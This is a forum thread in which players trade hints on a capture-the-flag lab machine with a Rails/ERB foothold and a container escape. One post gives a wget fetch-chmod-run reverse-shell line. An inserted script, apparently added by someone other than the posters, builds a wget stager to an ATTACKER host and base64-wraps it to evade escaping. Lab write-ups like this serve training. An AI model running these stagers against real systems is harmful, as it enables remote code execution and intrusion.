Official Laboratory Discussion

This box made me sweat. There are still some mysteries that I have not solved, like why a payload works for one person and not for another …

I spent a lot of time setting up the env

It is not an easy box for me.

If you need help, PM me.

Yikes, this is not an easy box for me.

I thought I had some plain Ruby working for generating the payload, but it's just not accepted. The 'other', more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: if you get a "Something went wrong" error, try a different bin.

What I suggest for those with payload problems: download a shell script from your local Python http.server to perform the reverse shell; special symbols may cause problems.

This approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

Trying the bash rev shell directly did not work for me, and the one I mentioned above was reliable every time (used it like 6 times due to resets and stuff).

Having zero luck getting the payload to hit a local web server. This one has bested me.

@trcm said:

Having zero luck getting the payload to hit a local web server. This one has bested me.

How are you generating it?

I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

Aha, progress. I had to add "--timeout=3 --tries=1", as wget wasn't reaching my web service and was executing in place on the Rails console, borking the ERB instance, it seems.
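The fetch-and-run stager suggested earlier in the thread, combined with the wget flags this post found necessary, as an added example that is not part of either poster's text. The URL, the /tmp/rev.sh path and the base64 wrapper are my own placeholders and assumptions, not anything from the box; the point it demonstrates is the thread's "special symbols may cause problems" remark: if the command is base64-wrapped before it goes into the payload, none of its quotes, ampersands or slashes has to survive the payload's own escaping.

```shell
#!/bin/sh
# Added example, not code from the thread. Hypothetical values: the URL,
# the /tmp/rev.sh path and the base64 wrapper are my choices, not the posters'.

# The stager the thread suggests: fetch a script from your own HTTP server
# and run it. --timeout=3 --tries=1 make wget give up quickly when the
# callback cannot reach you, instead of hanging the process that runs the
# payload.
stager_cmd() {
  url="$1"
  printf '%s\n' "wget --timeout=3 --tries=1 -O /tmp/rev.sh '$url' && chmod +x /tmp/rev.sh && /tmp/rev.sh"
}

# Wrap a command so that the text carried inside the payload is only
# base64 characters plus a fixed decoder: quotes, ampersands, slashes and
# other shell-special symbols never have to survive the payload's own
# quoting/escaping. The target needs base64(1) (coreutils) and sh.
encode_cmd() {
  enc=$(printf '%s' "$1" | base64 | tr -d '\n')
  printf '%s\n' "echo $enc | base64 -d | sh"
}

# True when the wrapped command contains nothing outside the base64
# alphabet and the decoder wrapper (letters, digits, + / =, space, | and -).
is_safe() {
  ! printf '%s' "$1" | grep -q '[^A-Za-z0-9+/= |-]'
}

# Inverse of encode_cmd, used to check the round trip.
decode_cmd() {
  printf '%s' "$1" | sed -e 's/^echo //' -e 's/ | base64 -d | sh$//' | base64 -d
}

# Usage (only prints the two forms; nothing is sent anywhere):
#   stager_cmd 'http://ATTACKER:8000/rev.sh'
#   encode_cmd "$(stager_cmd 'http://ATTACKER:8000/rev.sh')"
```

Serve rev.sh with `python3 -m http.server 8000` from the directory that holds it, and keep the listener for the reverse shell running before the payload fires; with `--tries=1` a failed fetch returns immediately rather than retrying, so a missed callback shows up as a single hit (or none) in the http.server log instead of a stalled Rails process.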

Rooted. The hardest part was finding the foothold. Thanks @siurana for the nudge. After finding an article with the right path, the rest was straightforward. Thanks @0xc45 for a fun box!

Alright, I think I know the vulnerability, but can someone help me with how to exploit it?

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?

@msimonelli said:

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?

You're probably not in the 'right' machine yet! You know some users; check where you are and what you can do from there.

Foothold was really painful. SomeONE helped and guided me with a lot of patience, thank you very much, once again.

But watch it yourself, we documented this process very thoroughly:

That was just foothold. After that things got better.

@iHeyHey said:

@msimonelli said:

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?

You're probably not in the 'right' machine yet! You know some users; check where you are and what you can do from there.

I got it, cheers.

Can someone give a nudge about user? I'm currently in c*******r but don't know how to escape. Is it needed to use an exploit or something else?

@Skyr00 said:

Can someone give a nudge about user? I'm currently in c*******r but don't know how to escape. Is it needed to use an exploit or something else?

DM’d you

I got sec***.yml and have all the keys; how and where do I use that? Can anyone help, please?

I got a shell and I'm in the c*******r, but I don't know what to do. Can someone PM me?

@mrg3ntl3m4n said:

I got a shell and I'm in the c*******r, but I don't know what to do. Can someone PM me?

Did you use the sec***.yml key to get the shell?

People will find this box a lot easier when they stop thinking of it as a ‘G*****’ exercise and start thinking of it as a Google exercise :smile: